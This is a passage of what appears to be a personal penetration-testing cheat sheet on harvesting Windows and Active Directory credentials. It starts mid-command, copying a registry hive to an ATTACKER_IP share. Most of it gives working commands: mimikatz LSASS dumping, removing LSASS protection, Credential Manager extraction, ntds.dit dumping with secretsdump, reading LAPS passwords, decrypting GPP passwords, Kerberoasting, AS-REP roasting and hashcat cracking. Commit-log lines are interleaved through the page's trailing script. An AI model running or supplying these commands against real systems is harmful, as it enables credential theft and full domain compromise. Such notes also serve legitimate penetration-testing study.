copy <span class="se">\\</span>?<span class="se">\G</span>LOBALROOT<span class="se">\D</span>evice<span class="se">\H</span>arddiskVolumeShadowCopy1<span class="se">\w</span>indows<span class="se">\s</span>ystem32<span class="se">\c</span>onfig<span class="se">\s</span>ystem <span class="se">\\</span>ATTACKER_IP<span class="se">\</span>
</code></pre></div>
<h3 id="dump-lsass">Dump LSASS</h3>
<ul>
<li>If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking <code>lsass.exe</code> -&gt; <code>creat dumpfile</code></li>
<li>
<p>Use <code>procdump.exe</code> from sysinternal suite as an alternative to <code>tskmgr.exe</code></p>
</li>
<li>
<p>Extract the dump via mimikatz</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>privilege::debug
sekurlsa::logonpasswords
</code></pre></div>
<h3 id="lsass-protection">LSASS Protection</h3>
<p><strong>The bypass is needed most of the time in order to dump passwords</strong>
* If the dump cannot be created because it is protected change <code>RunAsPPL</code> DWORD to <code>0</code> under</p>
<div class="codehilite"><pre><span></span><code>HKEY_LOCAL_MACHINE<span class="se">\S</span>YSTEM<span class="se">\C</span>urrentControlSet<span class="se">\C</span>ontrol<span class="se">\L</span>sa
</code></pre></div>
<ul>
<li>Alternatively, use mimikatz</li>
</ul>
<div class="codehilite"><pre><span></span><code>privilege::debug
!+
!processprotect /process:lsass.exe /remove
</code></pre></div>
<ul>
<li><code>+!</code> calls <code>mimidrv.sys</code>, <strong>therefore mimikatz has to be executed inside the same directory the this file lies</strong></li>
</ul>
<h3 id="windows-credential-manager">Windows Credential Manager</h3>
<ul>
<li>Can be found via <code>Control Pane</code> -&gt; <code>User Accounts</code> -&gt; <code>Credential Manager</code></li>
<li>Alternatively, command line can be used</li>
</ul>
<div class="codehilite"><pre><span></span><code>vaultcmd /list
vaultcmd /listproperties:<span class="s2">&quot;Web Credentials&quot;</span>
vaultcmd /listcreds:<span class="s2">&quot;web credentials&quot;</span>
</code></pre></div>
<ul>
<li>Extract the password via powershell script <a href="https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1">Get-WebCredentials from nishang</a></li>
</ul>
<div class="codehilite"><pre><span></span><code>powershell -ex bypass
Get-WebCredentials
</code></pre></div>
<ul>
<li>Via mimikatz if administrative permissions have been gained</li>
</ul>
<div class="codehilite"><pre><span></span><code>privilege::debug
sekurlsa::credman
</code></pre></div>
<h3 id="ntdsutil">Ntdsutil</h3>
<ul>
<li>If administrative permissions on the DC have been gained this can be done</li>
<li>Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM) </li>
</ul>
<h4 id="locally-extracting-ntdsdit">Locally extracting ntds.dit</h4>
<ul>
<li>This can be done to gather the system boot key</li>
<li>No AD credentials are needed</li>
<li>
<p>Three files are needed</p>
<ul>
<li>C:\Windows\NTDS\ntds.dit</li>
<li>C:\Windows\System32\config\SYSTEM</li>
<li>C:\Windows\System32\config\SECURITY</li>
</ul>
</li>
<li>
<p>Locally dumping all three needed file is done via</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>powershell <span class="s2">&quot;ntdsutil.exe &#39;ac i ntds&#39; &#39;ifm&#39; &#39;create full C:\Windows\Temp\ntds&#39; q q&quot;</span>
</code></pre></div>
<ul>
<li>Use <code>secretsdump</code> to extract <code>ntds.dit</code></li>
</ul>
<div class="codehilite"><pre><span></span><code>secretsdump.py -security ./SECURITY -system ./SYSTEM -ntds ./ntds.dit <span class="nb">local</span>
</code></pre></div>
<h4 id="remotely-dumping-ntds">Remotely dumping ntds</h4>
<ul>
<li>
<p>Needs the following AD credentials </p>
<ul>
<li>Replicating Directory Changes</li>
<li>Replicating Directory Changes All</li>
<li>Replicating Directory Changes in Filtered Set</li>
</ul>
</li>
<li>
<p>Mimikatz or impacket can be used to gain credentials</p>
</li>
<li>Impacket's secretsdump.py via</li>
</ul>
<div class="codehilite"><pre><span></span><code>secretsdump.py -just-dc &lt;domain&gt;/&lt;AD_Admin_User&gt;@<span class="nv">$DC_IP</span>
secretsdump.py -just-dc-ntlm &lt;domain&gt;/&lt;AD_Admin_User&gt;@<span class="nv">$DC_IP</span>
</code></pre></div>
<h3 id="local-administration-password-solution-laps">Local Administration Password Solution (LAPS)</h3>
<ul>
<li>This is possible if the user which credentials we posses is member of the group to make password changes</li>
<li>
<p>Replaces GPP, see below</p>
</li>
<li>
<p>There are two interesting attributes</p>
<ul>
<li><strong>ms-mcs-AdmPwd</strong> contains plain text password of the local Administrator</li>
<li><strong>ms-mcs-AdmPwdExpirationTime</strong> contains the expiration date of the admin password</li>
</ul>
</li>
<li>
<p><strong>admpwd.dll</strong> is used to update the password inside <strong>ms-mcs-AdmPwd</strong></p>
<ul>
<li>If LAPS is enabled the dll can be found in <code>C:\Program Files\LAPS\CSE</code></li>
</ul>
</li>
<li>
<p>List the cmdlets for LAPS</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>Get-Command *AdmPwd*
</code></pre></div>
<ul>
<li>Find the Organisational Unit with extended rights and take a look at the group under <code>ExtendedRightsHolder</code> in the output</li>
</ul>
<div class="codehilite"><pre><span></span><code>Find-AdmPwdExtendedRights -Identity &lt;OU&gt;
</code></pre></div>
<ul>
<li>Enumerate which hosts have LAPS enabled</li>
<li>Impersonate the user and execute the following which displays the password</li>
</ul>
<div class="codehilite"><pre><span></span><code>Get-AdmPwdPassword -ComputerName &lt;targethost&gt;
</code></pre></div>
<ul>
<li>Use the property name displayed under <code>ExtendedRightsHolder</code> to enumerate groups and their users</li>
</ul>
<div class="codehilite"><pre><span></span><code>net groups &lt;ExtendedRightsHolder&gt;
net user &lt;GroupMemberUsername&gt;
</code></pre></div>
<h4 id="group-policy-preferences">Group Policy Preferences</h4>
<ul>
<li>Provisions administrational groups through the domain via SYSVOL</li>
<li>Distribution is done through XML files on SYSVOL. These contain a password encrypted with <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN">the published private key</a></li>
<li>Use <a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1">Powersploit's Get-GPPPassword</a> to decrypt it</li>
</ul>
<h3 id="kerberoasting">Kerberoasting</h3>
<ul>
<li>Inital (low level) credentials are needed</li>
<li><strong>Service Principal Name (SPN)</strong> account must be known, e.g. from web IIS user or SQL users</li>
</ul>
<div class="codehilite"><pre><span></span><code>GetUserSPNs.py -dc-ip <span class="nv">$DC_IP</span> &lt;domain&gt;/&lt;user&gt;
</code></pre></div>
<ul>
<li>Take a look at <code>Name</code> in the output and use it to query a TGS ticket </li>
</ul>
<div class="codehilite"><pre><span></span><code>GetUserSPNs.py -dc-ip <span class="nv">$DC_IP</span> &lt;domain&gt;/&lt;user&gt; -request-user &lt;SPN&gt;
</code></pre></div>
<ul>
<li>Crack the kerberos hash</li>
</ul>
<div class="codehilite"><pre><span></span><code>hashcat -m <span class="m">13100</span> -a0 hash.txt --wordlist &lt;wordlist&gt;
</code></pre></div>
<h3 id="as-rep-roasting">AS-REP Roasting</h3>
<ul>
<li><code>Do not require Kerberos pre-authentication</code> must be set on the AD user's account login settings. A password is used instead</li>
<li>A list of potential users with this configured setting should be gathered</li>
</ul>
<div class="codehilite"><pre><span></span><code>GetNPUsers.py -dc-ip <span class="nv">$DC_IP</span> &lt;domain&gt;/ -usersfile users.txt
</code></pre></div>
init
2022-09-02 09:05:59 +02:00
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
Added settings.toml
2022-09-09 15:41:05 +02:00
function linkClick(obj) {
init
2022-09-02 09:05:59 +02:00
if (obj.open) {
Added settings.toml
2022-09-09 15:41:05 +02:00
//console.log('open');
init
2022-09-02 09:05:59 +02:00
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
Added settings.toml
2022-09-09 15:41:05 +02:00
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
init
2022-09-02 09:05:59 +02:00
} else {
Added settings.toml
2022-09-09 15:41:05 +02:00
//console.log('closed');
sessionStorage.removeItem(obj.id);
}
}
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length; i++ ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
init
2022-09-02 09:05:59 +02:00
</script>
Added settings.toml
2022-09-09 15:41:05 +02:00
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
init
2022-09-02 09:05:59 +02:00
<script type="text/x-mathjax-config">
Added settings.toml
2022-09-09 15:41:05 +02:00
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
init
2022-09-02 09:05:59 +02:00
</body>
</html>